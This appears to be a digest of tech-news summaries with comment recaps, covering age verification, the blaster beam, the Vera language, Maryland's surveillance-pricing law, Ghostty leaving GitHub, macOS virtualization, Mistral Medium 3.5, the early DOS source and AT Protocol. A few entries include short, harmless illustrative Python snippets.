Comments: Commenters are broadly skeptical of mandatory age verification, framing it as identity verification in disguise. Technical alternatives are widely cited — zero-knowledge proofs, fully homomorphic encryption, RTA content-labeling headers, Estonia's cryptographic hardware-key model — but governments show no interest in privacy-preserving options. UK users report feeling politically powerless after the Online Safety Act passed; Greece banning online anonymity is cited as the logical endpoint. Many warn mandatory ID verification will normalize large-scale identity fraud as privacy-seeking adults circumvent systems. Others push back: some argue age-gating pornography or social media differs little from gambling or alcohol rules, and First Amendment constraints limit slippery-slope fears. Parental responsibility is a strong counter-theme. The EFF's resource page is mentioned as an action item. One commenter proposes a "Cashier Standard" — offline-style age checks without digital infrastructure. Others note a sudden, coordinated international push for these laws with no clear public origin, and that YC funds companies building the very verification systems being debated.

The blaster beam is a large electric instrument — a 12–18-foot metal beam strung with tensed wires and fitted with movable guitar pickups — that produces a distinctive dark, bass tone when plucked or struck with fingers, sticks, or pipes. Designed by John Lazelle in the early 1970s and first widely used by Francisco Lupica, it gained widespread fame through Craig Huxley's refined aluminum version, most notably in Jerry Goldsmith's score for Star Trek: The Motion Picture (1979) as the signature V'ger sound, and earlier that year on a Wonder Woman episode. Huxley patented his design in 1984 and co-wrote David Shire's 2010 (1984) score, while James Horner used it in Battle Beyond the Stars (1980) and Star Trek II: The Wrath of Khan (1982). It also appeared in The Black Hole, Dreamscape, Meteor, and Star Wars: Episode II for the seismic charge sound, and in Bear McCreary's 10 Cloverfield Lane (2016). A notable curiosity arose in the early 1990s when women at a Central Park concert claimed arousal from the sound, prompting an Australian radio experiment that yielded no similar results from listeners.

Comments: The sole comment expresses genuine skepticism about whether the blaster beam actually exists, noting that the instrument's official website shows only bare metal beams with no strings or pickups visible, and that the Wikipedia article's photo is too small and blurry to be convincing. The commenter questions whether the whole thing might be a late April Fools joke, reflecting a broader challenge the instrument faces in public recognition despite its documented use across decades of well-known film scores.

Vera is a programming language designed for LLMs to write, compiling to WebAssembly and running in browser or CLI. Rather than variable names, it uses typed structural references (@Int.0, @Int.1) to eliminate naming errors models commonly make. Every function requires mandatory contracts — preconditions, postconditions, and effect declarations — verified by Z3 SMT solver, making division by zero a compile-time type error. Effects are fully typed: a function using HTTP or LLM inference must declare those in its signature, and callers lacking those permissions cannot invoke it. Three-tier verification covers decidable arithmetic statically, guided cases, and runtime fallback. The compiler emits LLM-oriented diagnostics with stable error codes, JSON output, and fix instructions with code examples. VeraBench results show Kimi K2.5 achieves 100% run_correct on Vera versus Python's 86% and TypeScript's 91%, with three models beating TypeScript. The reference compiler is at v0.0.127 with 3,638 tests and 96% code coverage; the roadmap targets a verified MCP tool server where contracts guarantee tool schemas at compile time.
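Vera proves most contracts statically with Z3; the decorator below only illustrates the runtime-fallback tier of that scheme in Python terms. The function name and contract are invented for illustration, not taken from Vera itself.

```python
# Illustration of contract checking via runtime fallback (the third tier in a
# static-first verification scheme): a precondition is evaluated before the
# function body runs. In Vera proper, a contract like "b != 0" would be
# discharged at compile time by the SMT solver instead.
def requires(pred, message):
    def wrap(fn):
        def inner(*args):
            if not pred(*args):
                raise ValueError(f"precondition violated: {message}")
            return fn(*args)
        return inner
    return wrap

@requires(lambda a, b: b != 0, "divisor must be nonzero")
def safe_div(a, b):   # hypothetical function, not Vera syntax
    return a // b
```

Calling `safe_div(10, 2)` returns 5, while `safe_div(1, 0)` raises before the division executes; a compiler with solver support can reject the second call without running anything.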

Comments: Commenters praise Vera's effect type system as especially well-suited for LLM-generated code, noting it enables capability proofs before runtime — you can verify agent code cannot perform IO, or sandbox it with mock network or filesystem access if it must, providing a safer foundation for meta-systems where agents create other agents. One commenter requests more technical depth on how division by zero becomes a compile-time type error. The most pointed skepticism targets the elimination of variable names: commenters question whether structural references actually improve LLM code generation or simply introduce obfuscation, noting the claim feels unsupported by empirical evidence — challenging one of Vera's central design premises.

Maryland has become the first US state to ban grocery surveillance pricing, with Governor Wes Moore signing the bill into law on Tuesday. Surveillance pricing uses personal data — location, search history, demographics — to charge buyers the maximum they'll pay. The FTC under Biden documented the practice broadly, but the current administration is unlikely to act; Colorado, California, Massachusetts, Illinois, and New Jersey are considering similar laws. Critics say Maryland's law is undermined by exemptions for loyalty programs and promotional offers — letting retailers raise baseline prices then offer personalized discounts, achieving the same discriminatory outcome the law aims to prohibit. Enforcement falls to the attorney general only; individuals cannot sue, and penalties are capped at $10,000 for a first offense and $25,000 for subsequent violations. Consumer Reports called enforcement "weak" and urged lawmakers to revisit the legislation. Instacart, previously exposed by Consumer Reports, says it already stopped the practice. Advocates warn other states may replicate Maryland's law, calling it an "industry-written permission slip."

Comments: Commenters question how surveillance pricing would function in physical grocery stores, where shelf prices are publicly visible and must match checkout prices. Many note loyalty programs and coupon clipping have long enabled differential pricing — exempting them arguably guts the law's intent. Critics point out fines of $10,000–$25,000 are laughably small for retailers large enough to deploy such systems. Several highlight the core loophole: a retailer can raise prices for everyone then offer personalized discounts, arriving at the same discriminatory outcome the law purports to ban. The absence of a private right of action — only the AG can enforce — is widely seen as a fundamental accountability failure. Users debate whether the law is worse than nothing, since other states may adopt it as a template despite its weaknesses. Some suggest simpler strategies, like shopping at stores without loyalty programs, offer more practical protection. Broader concerns were raised that increasingly adversarial dynamic pricing could make household budgeting nearly impossible for lower-income shoppers, and that buyers may eventually need AI agents just to compete.
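The loophole commenters describe reduces to simple arithmetic: the checkout totals are identical whether a retailer charges a surveilled-up price directly or inflates the baseline and hands untargeted shoppers a "personalized discount." The prices below are invented for illustration.

```python
# Invented numbers illustrating the exemption loophole in Maryland's law.
base_price = 4.00        # shelf price before any surveillance pricing

# Banned path: charge a targeted shopper more outright.
targeted_price = 5.00

# Exempted path: raise the shelf price for everyone, then give untargeted
# shoppers a loyalty "discount" back down to the old baseline.
shelf_price = 5.00
loyalty_discount = 1.00

untargeted_pays = shelf_price - loyalty_discount   # back to 4.00
targeted_pays = shelf_price                        # 5.00 — same outcome as the banned path
```

Both paths leave the targeted shopper paying 5.00 and everyone else paying 4.00, which is why critics argue the loyalty-program exemption guts the law's intent.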

Mitchell Hashimoto, creator of Ghostty terminal emulator and GitHub user #1299 since February 2008, announced Ghostty will leave GitHub after 18 years, citing near-daily platform outages blocking productive work. Over a recent month he kept a journal marking impacted days — nearly every day got an X — with the core problem being not Git itself but centralized tooling around it: Issues, PRs, and Actions. He describes deep personal attachment to GitHub but says it is "no longer a place for serious work." The migration is incremental: a read-only mirror stays at the current URL, personal projects remain on GitHub for now, and the team is evaluating commercial and FOSS alternatives, with an announcement due in coming months. Hashimoto pre-empts two criticisms: the timing is coincidental with the large April 27, 2026 Elasticsearch outage (the post was written a week earlier referencing a separate Actions outage), and the problem is not distributed Git but GitHub's centralized infrastructure layer. He also apologizes for publicly lashing out at GitHub employees, attributing his anger to genuine long-standing affection for the platform.

Comments: Commenters broadly validate the frustrations, attributing GitHub's decline to Microsoft's acquisition, resource diversion to Copilot, and allegedly AI-generated internal code. Alternatives discussed include Codeberg, Forgejo, GitLab, Radicle, and Tangled (ATProto-based), with federation and identity portability flagged as key unsolved problems. A GitHub Staff Research Engineer is quoted saying PRs and Issues aren't seen as ideal future primitives even internally. Community fragmentation concerns are prominent, as GitHub's network effects and discovery features are seen as hard to replicate. Some users question whether daily outages are truly universal, noting GitHub's enormous scale — nearly 180M users and one billion commits per year. Copilot training on user code without consent is cited by several as a prior reason to have already left. A serious cross-repository access security vulnerability disclosed the same day adds further concern. Commenters note the dark irony that Hashimoto had to clarify in footnotes which specific outage he was even referencing.

macOS virtualization on Apple Silicon is built on a hypervisor and Virtio drivers (a paravirtualized I/O standard originated by Rusty Russell), which abstract I/O devices so that virtualizer apps need only configure Virtio devices rather than implement low-level hardware support. Apple built Virtio into macOS with Monterey, so both host and guest must run Monterey or later. Performance is near-native: CPU single-core ~94% of host, GPU Metal ~92%, and VM Performance-core threads can outpace the host's Efficiency-core equivalent. Rosetta 2 works inside macOS VMs for 64-bit Intel apps but cannot translate a guest OS (UTM handles that via emulation). Key limitations include: most App Store apps fail due to signing restrictions; a hard cap of two concurrent VMs is enforced by macOS; iCloud requires Sequoia on both host and guest. Network always presents as Ethernet, audio is partial, and the license limits VM use to dev, testing, macOS Server, or personal non-commercial use. Practical uses include compatibility testing, sandboxed security work, running version-incompatible apps, and accessing a secondary iCloud account.

Comments: A major practical grievance is that bidirectional clipboard between macOS-on-macOS VMs is effectively broken: UTM's shared clipboard is fragile and unreliable, while Parallels explicitly does not support it for macOS guests on Apple Silicon—clipboard works for cross-platform guests (e.g., Linux) but not macOS-to-macOS. One commenter clarifies UTM is not purely a software emulator; it can use the hypervisor for ARM guests like Windows ARM, which the article's phrasing obscured. Additional notes: Apple's open-source container runtime is built on the Virtualization framework (more security-isolated than Docker), VM launch times suit serverless workloads, and snapshots work for macOS but not Linux guests. The Secure Enclave situation is unresolved—Apple ID login and enclave APIs function in VMs, but whether this uses the host enclave with a different security scope is unclear, raising concerns for automated or CI contexts. One commenter dismissed the article as AI-generated clickbait, while others found it a useful technical overview of Apple Silicon virtualization internals.

Mistral has released Medium 3.5, a 128B dense model with a 256k context window handling instruction-following, reasoning, and coding in a single set of weights, available as open weights under a modified MIT license. Scoring 77.6% on SWE-Bench Verified, it outperforms Devstral 2 and Qwen3.5 397B A17B while self-hosting on as few as four GPUs, becoming the new default in Le Chat and Vibe CLI. Remote cloud coding agents in Vibe allow async sessions to run in parallel, with local CLI sessions "teleportable" to the cloud carrying full session history and approvals. Integrations span GitHub, Linear, Jira, Sentry, and Slack, targeting high-volume defined work like refactors, test generation, and dependency upgrades. A new Work mode in Le Chat uses Medium 3.5 as a multi-step agentic backend for cross-tool workflows across email, calendar, documents, and web research, requiring explicit approval before sensitive actions. API pricing is $1.5 per million input tokens and $7.5 per million output tokens, on Pro, Team, and Enterprise plans, with open weights on Hugging Face.
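As a rough illustration of the quoted pricing, a small helper makes the per-session economics concrete. The session token counts below are invented, not Mistral figures.

```python
# Back-of-envelope cost helper for the quoted Medium 3.5 API pricing:
# $1.5 per million input tokens, $7.5 per million output tokens.
INPUT_PER_M, OUTPUT_PER_M = 1.5, 7.5

def cost_usd(input_tokens: int, output_tokens: int) -> float:
    return (input_tokens * INPUT_PER_M + output_tokens * OUTPUT_PER_M) / 1_000_000

# Hypothetical refactor-style agent session: 200k tokens in, 40k out.
session = cost_usd(200_000, 40_000)   # 0.30 + 0.30 = 0.60 USD
```

The asymmetry matters for agentic workloads: long context reads are cheap relative to generated output, so a 5:1 input/output ratio still splits cost evenly here.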

Comments: Users find Medium 3.5 competitive for its size — runnable at Q4 quantization with ~70GB VRAM, approaching Mac Studio consumer territory — but not beating frontier models. A core criticism is that DeepSeek v4 Flash (MoE) achieves faster local inference at similar VRAM footprints, prompting debate over why Mistral chose a dense 128B architecture. Pricing at $1.5/$7.5 per million tokens draws skepticism since smaller Chinese models and Haiku undercut it while benchmarks show Medium 3.5 merely competitive, not dominant. Enterprise self-hosting appeal is noted — four instances fit on an H100 cluster versus one or two larger MoE rivals. A SWE-Bench contamination concern surfaces since OpenAI dropped that benchmark two months prior. Platform issues include strict CSP headers breaking JavaScript previews in Le Chat and poor Vibe CLI behavior on Windows. Users broadly support Mistral as a European alternative to US and Chinese labs, but several note the capability gap between frontier and non-frontier models has widened in the agentic era, making non-frontier choices increasingly costly in productivity.

Tim Paterson's original DOS source listings — physical printouts on continuous-feed paper — have been transcribed and published as compilable assembly source code. The collection spans 10 bundles printed between 1981 and 1982, containing the 86-DOS 1.00 kernel, various PC-DOS 1.00 pre-release kernels and utilities, and the Microsoft BASIC-86 Compiler runtime library. Key files include 86DOS.ASM, 86DOS.A86, EDLIN.DIF, CHKDSK.A86, and BASLIB.PRT. Three download tiers are offered: raw transcription of printer output, extracted original files, and fully compilable source. CRC checksums embedded in the original printout margins were used to self-verify OCR accuracy during transcription. The source targets Seattle Computer Products' ASM assembler and HEX2BIN utility, both available from early 86-DOS or MS-DOS releases. Bundles 9 and 10, totaling nearly 480 pages covering the BASIC runtime library and graphics routines (PAINT.ASM, CIRCLE.ASM), remain untranscribed and are open for pull request contributions. The release enables direct examination of whether CP/M code from Gary Kildall was incorporated into the earliest DOS version.
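The margin-checksum trick can be sketched briefly: recompute a checksum over each transcribed line and compare it against the value printed in the listing margin, so OCR errors surface immediately. The checksum algorithm the 1981 printouts actually used is not specified here, so CRC-16/ARC serves purely as a stand-in, and the source line is hypothetical.

```python
# Sketch of checksum-verified transcription. CRC-16/ARC (poly 0x8005,
# reflected) is used only as a stand-in for whatever checksum the original
# listing printer emitted in its margins.
def crc16_arc(data: bytes) -> int:
    crc = 0x0000
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc

def verify_line(transcribed: str, margin_checksum: int) -> bool:
    """True iff the transcription reproduces the checksum printed in the margin."""
    return crc16_arc(transcribed.encode("ascii")) == margin_checksum

line = "MOV AX,DS"                      # hypothetical transcribed source line
printed = crc16_arc(line.encode())      # stands in for the margin value
```

Because any single-character OCR error changes the CRC, a matching checksum gives strong per-line confidence without manually proofreading hundreds of pages.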

Comments: Microsoft published an official announcement with complementary links alongside this release. The transcription methodology is praised specifically for its use of CRC checksums printed in the listing margins to self-verify OCR accuracy — a clever approach that gave the work high fidelity. One commenter recalls working for someone in the Pacific Northwest early microcomputer scene who owned a Seattle Computer Gazelle reportedly "might be the one DOS was written on," still operational, and suggests a major tech company should find resources to acquire it for historical preservation. The most historically significant observation across comments is that having the actual assembler source now makes it possible to directly examine Gary Kildall's long-standing claim that CP/M code was copied into the first version of DOS — a question previously unanswerable without this primary source material.

AT Protocol (atproto) is a decentralized social data network developed by Bluesky where all social objects — posts, likes, follows, profiles — are stored as strongly-typed JSON records in user repositories. Records use shared schemas for composition and extension, content-IDs for strong cross-user linking, and every object has a canonical URL. The protocol exposes a public firehose (WebSocket event stream) of all public activity requiring no API key, letting developers build feeds, bots, search engines, and live applications. A bsky.storage tool automates periodic account data backups to a storage network and provides PLC identity backup and recovery, giving users stronger data control without self-hosting a full Personal Data Server (PDS). The protocol's core model is: users publish JSON records into repositories, and changestreams of those records sync across the network to drive applications — though this summary is buried behind a "GET STARTED" click rather than displayed prominently on the landing page.
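The data model above can be sketched concretely: a social object is a typed JSON record in a user's repository, addressable by an `at://` URI of the form `at://<did>/<collection>/<rkey>`. The DID and record key below are made up; `app.bsky.feed.post` is the real lexicon type for posts.

```python
# Minimal sketch of the atproto record model: typed JSON records in a user
# repository, each with a canonical at:// URI.
import json

did = "did:plc:abc123examplexyz"        # hypothetical user identifier
collection = "app.bsky.feed.post"       # lexicon schema naming the record type
rkey = "3k2aexamplerkey"                # hypothetical record key within the collection

record = {
    "$type": collection,
    "text": "hello from the open social web",
    "createdAt": "2026-01-01T00:00:00Z",
}

at_uri = f"at://{did}/{collection}/{rkey}"
wire = json.dumps(record)               # records travel as JSON over the firehose
```

A consumer of the public firehose sees events carrying records like this one and can index, filter, or re-render them without any API key, which is what makes third-party feeds and search engines possible.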

Comments: Users compare AT Protocol's federation model to email interoperability between providers like Gmail and Outlook, praising its decentralized architecture as evoking the pre-big-tech open internet era, with some seeing it as a potential modern Usenet replacement. An overreacted.io post titled "A Social Filesystem" is highlighted as a strong primer on the protocol's concepts. Criticism surfaces that the concise core explanation — "users publish JSON records, changestreams sync across the network to drive applications" — is buried behind navigation rather than featured on the landing page. Interest is expressed in adding file-level permissions (read/write/list/delete for users and groups) to support private or group-scoped applications, such as a private collaborative design tool. Questions arise about the practical advantages of self-hosting a PDS versus relying on hosted infrastructure. Users also note AT Protocol's rich-text standoff markup approach and reference a retro etherpeg-style visualizer at bsky.land as a fun demonstration of the protocol's capabilities.